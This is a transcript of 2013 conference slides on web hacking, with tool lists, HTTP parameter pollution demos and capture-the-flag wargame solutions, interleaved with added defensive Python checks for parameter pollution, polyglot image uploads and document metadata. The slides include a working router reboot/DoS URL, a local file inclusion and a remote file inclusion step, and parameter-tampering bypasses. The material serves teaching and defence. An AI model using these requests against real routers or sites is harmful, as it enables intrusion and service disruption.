Hand’s on Web Hacking, BalCCon 2k13
TRANSCRIPT
![Page 2: Hand’s on Web Hacking BalCCon 2k13 · Pentesting Web Applications o OSINT / Google Hacking o Passive analysis o Automated analysis o Social Engineering . My toolbox •Proxy (BurpSuite)](https://reader034.vdocument.in/reader034/viewer/2022042215/5ebd76733ffef9286f48cc51/html5/thumbnails/2.jpg)
Self promotion :D
Disclaimer
• This presentation represents my personal thoughts, not those of my employers or clients.
• All research was conducted for educational purposes only.
• If you get in trouble after this session I can’t help you. Your irresponsibility is not my concern.
Today we will …
• Talk about everyday penetration testing situations
• Make a quick overview of common web application vulnerabilities and really funny developer ideas
• Remember some old techniques and meet a few very creative new ones
• See what a “malicious pentester” does when finding a vulnerability in old web applications
• Find out how to get paid for long nights and Red Bulls :)
• Play WARGAME with new levels
Pentesting Web Applications
o OSINT / Google Hacking
o Passive analysis
o Automated analysis
o Social Engineering
My toolbox
• Proxy (BurpSuite)
• Fuzzers (DirBuster, DFF Scanner)
• DB Exploitation => SQLMAP
• Vulnerability scanners (Skipfish, Nikto, BurpSuite, w3af, IBM Rational AppScan, Acunetix)
• Firefox with plugins!
• Custom scripting rulez (html, js, php, python, ruby, perl, C, bash, powershell, asp, …)
Firefox + Plugins
• Firebug
• Web Developer
• Tamper Data
• Proxy Switcher
• Live HTTP headers
• RESTClient
• ScreenGrabber, Colorzilla, Greasemonkey, User Agent Switcher, XSS ME, …
OWASP TOP 10
Local chapter: https://www.owasp.org/index.php/Serbia
More interesting stuff:
• Blind SQL injection (SQLMap)
• HTTP parameter pollution & contamination
• Upload forms failure to failure (gif2php)
• Living dead VB script
• Document Properties
• HTTP QUERIES, few funny ones :)
HPP & HPC
• HPP POC:
http://website.tld/index.php?a=1&a=1
a = ?
Link: https://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf
• HPC POC:
http://website.tld/index.php?a[=1
a = ?
Link: http://www.exploit-db.com/wp-content/themes/exploit/docs/17534.pdf
HPP & HPC / MS EXAMPLE
https://www.microsoft-careers.com/search
?q=test&q=test
?q.=test&q=123
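The two proofs of concept and the MS example above, worked through as an added example that is not from the slides: it shows how repeated parameter names resolve on different stacks (policy attributions follow the OWASP HPP paper linked above), how PHP rewrites parameter names while building `$_GET`, and the checks a WAF or input filter should apply before trusting a name. Standard-library Python only; all URLs are the ones on the slides or constructed.

```python
# Added example (not from the slides): HPP resolution policies, PHP-style
# name rewriting behind HPC, and the audit a filter should run on a query.
from urllib.parse import parse_qsl, urlsplit

def query_pairs(url):
    """Raw (name, value) pairs in order, keeping duplicates and blank values."""
    return parse_qsl(urlsplit(url).query, keep_blank_values=True)

def resolve(pairs, policy):
    """Collapse repeated names the way the linked HPP paper reports common
    stacks doing it: 'first' (Java servlet getParameter), 'last' (PHP $_GET),
    'join' (ASP.NET joins the values with a comma)."""
    out = {}
    for name, value in pairs:
        if name not in out or policy == "last":
            out[name] = value
        elif policy == "join":
            out[name] = out[name] + "," + value
    return out

def php_name(name):
    """PHP rewrites '.' and ' ' to '_' and an unterminated '[' to '_' while
    building $_GET, so 'q.' arrives as 'q_' and 'a[' as 'a_' although a
    filter in front of the application saw the original spelling."""
    name = name.replace(".", "_").replace(" ", "_")
    i = name.find("[")
    if i != -1 and "]" not in name[i:]:
        name = name[:i] + "_" + name[i + 1:]
    return name

def audit(url):
    """What a WAF or input filter should flag: repeated names (HPP), names
    the backend will rewrite, and distinct raw names that become the same
    name after rewriting (HPC collisions)."""
    raw = [n for n, _ in query_pairs(url)]
    distinct = set(raw)
    return {
        "duplicated": sorted({n for n in raw if raw.count(n) > 1}),
        "rewritten": sorted({n for n in raw if php_name(n) != n}),
        "collide": sorted({php_name(n) for n in distinct
                           if len({r for r in distinct
                                   if php_name(r) == php_name(n)}) > 1}),
    }
```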
Upload forms failure to failure
• UPLOAD RESTRICTIONS:
– MIME TYPE
– FILE EXTENSION
What about content review?
Or “polymorphic” files?
gif2php
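Server-side checks that answer the two questions on the previous slide (content review and “polymorphic” files such as gif2php), as an added example that is not from the slides. It ignores the client-declared MIME type, verifies the real magic bytes against the extension, and refuses image data that also carries a server-side script tag. The sample bytes are constructed.

```python
# Added example (not from the slides): upload validation that goes beyond
# MIME type and extension checks. Sample inputs are constructed.
import re

# Extension allowlist with the magic bytes each one must start with.
ALLOWED = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
}
# Tags that must never occur inside something stored and served as an image;
# a file that is both a valid GIF and PHP source is the gif2php case.
SCRIPT_TAGS = re.compile(rb"<\?php|<\?=|<\?\s|<%|<script", re.IGNORECASE)

def check_upload(filename, data):
    """Return (accepted, reason). Only the bytes and the final extension are
    inspected; the client's Content-Type header is deliberately not an input."""
    parts = filename.lower().rsplit(".", 1)
    if len(parts) != 2 or parts[1] not in ALLOWED:
        return False, "extension not allowed"
    if filename.count(".") > 1:            # shell.php.gif style double extensions
        return False, "multiple extensions"
    if not data.startswith(ALLOWED[parts[1]]):
        return False, "magic bytes do not match extension"
    if SCRIPT_TAGS.search(data):
        return False, "script tag inside image data"
    return True, "ok"
```

Accepted files should still be stored under a server-generated name in a directory the web server will not execute scripts from.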
Living dead VB script
• Not so common these days, but very popular in old bank-managed Windows networks :)
• Nice tool for exploitation of Internet Explorer users through social engineering attacks
• Don’t forget about it!
Document Properties
• Documents from websites can provide very useful information about your target: … versions of applications and files, people’s names, emails, network addresses, printers, comments, …
• Forensic FOCA, HTTrack Website Copier
• Custom scripting!
Document Properties
In one old research project I used only HTTrack and two custom-written PowerShell scripts to get a bunch of interesting information about banks in Serbia :D
Document Properties
http://security-net.biz/files/Napad-na-atribute-online-dokumenata-%5Bprimer-banke-u-Srbiji%5D_Ivan-Markovic-NSS.pdf
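The metadata audit the three Document Properties slides describe, as an added example that is not from the slides or the linked paper (Python rather than PowerShell): a .docx is a zip archive whose docProps/core.xml and docProps/app.xml carry the author, last editor, company and application version that tools like FOCA harvest. A minimal document is constructed in memory so the script runs offline; the names in it are invented.

```python
# Added example (not from the slides): list the identifying properties an
# Office document publishes, so they can be scrubbed before upload.
import io
import re
import zipfile

# Document part -> tags worth reporting (constructed selection, not exhaustive).
FIELDS = {
    "docProps/core.xml": ("dc:creator", "cp:lastModifiedBy", "dcterms:created"),
    "docProps/app.xml": ("Application", "AppVersion", "Company", "Template"),
}

def document_metadata(blob):
    """Return {tag: value} for the identifying fields found in the docx bytes."""
    found = {}
    with zipfile.ZipFile(io.BytesIO(blob)) as z:
        for part, tags in FIELDS.items():
            if part not in z.namelist():
                continue
            xml = z.read(part).decode("utf-8", "replace")
            for tag in tags:
                m = re.search(rf"<{re.escape(tag)}[^>]*>([^<]*)</{re.escape(tag)}>", xml)
                if m and m.group(1).strip():
                    found[tag] = m.group(1).strip()
    return found

def build_sample_docx():
    """Constructed minimal docx-like archive with leaky properties."""
    core = ('<cp:coreProperties><dc:creator>jane.doe</dc:creator>'
            '<cp:lastModifiedBy>CORP\\jdoe</cp:lastModifiedBy></cp:coreProperties>')
    app = ('<Properties><Application>Microsoft Office Word</Application>'
           '<AppVersion>12.0000</AppVersion><Company>Example Bank</Company></Properties>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("docProps/core.xml", core)
        z.writestr("docProps/app.xml", app)
        z.writestr("word/document.xml", "<w:document/>")
    return buf.getvalue()

def leaks(blob):
    """Tags a publisher should strip before the file goes on the web site."""
    return sorted(document_metadata(blob))
```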
HTTP QUERIES, QUERIES :)
• Public directory listing on the website of one of the biggest companies in Serbia: http://www.site.rs/anydir?.listing
• Public debug functions in a news publishing application from Serbia:
http://www.site.rs/anyfile?&debug
Public secret
Everyone knows that Serbian websites are not very popular with hackers and their business? XSS and CSRF are not marked red?
More fun info :)
• KEYLOGGER on the web presentation of one of the banks in Serbia! (Year 2010)
More fun info :)
• XXX content on “MB Brewery” in Serbia:
More fun info :)
• Serbian Telekom ADSL router Authentication Bypass + CSRF = DoS :D
• http://PUBLIC_IP_OF_USER/rebootinfo.cgi
• POC: Huawei HG510 (Year 2010 and still works)
For more details: http://www.routerpwn.com/
More backdoors on web servers
Bounty programs
• http://www.ehackingnews.com/2012/12/list-of-bug-bounty-program-for.html
• (Google, PayPal, Adobe, Mozilla, Facebook, …)
• And one from Serbia: https://managewp.com/white-hat-reward
Wargame
• Level 1:
– Decrypted (base64): “Hi Nate, URL params are still works.”
– Bingo: http://wargame.balccon.org/index.php?admin=1
Wargame
• Level 2:
Bingo (HPP): http://wargame.balccon.org/index.php?cmd=ssh+10&cmd=4&cmd=55&cmd=2
Wargame
• Level 3:
Bingo: Decrypted (Cookie: (role, user)) => role = admin
Wargame
• Level 4:
Bingo: DirBuster => http://wargame.balccon.org/public/target.txt
http://wargame.balccon.org/index.php?file=public/target
Wargame
• Level 4:
http://wargame.balccon.org/public/target.txt
BINGO: http://wargame.balccon.org/index.php?file=public/target&switch=1
<?php $switch = $_GET['switch']; ?>
Wargame
• Level 5:
http://wargame.balccon.org/public/manual.txt
$RFI->Load->Remote(return [FUNC]) use content from remote source as code [FUNC].
... For remote calls please use RFI POST variable. ...
Wargame
• Level 5:
BINGO (OR ANY REMOTE FILE with that content): http://wargame.balccon.org/public/loadAllFunctions.dat
loadAllFunctions via HTTP POST to http://wargame.balccon.org/ with the POST variable RFI=http://wargame.balccon.org/public/loadAllFunctions.dat
Wargame / Press Start
New Levels http://wargame.balccon.org/
Outro
Thanks :) [email protected]
"If you think you are too small to make a difference,
try sleeping with a mosquito." - Dalai Lama XIV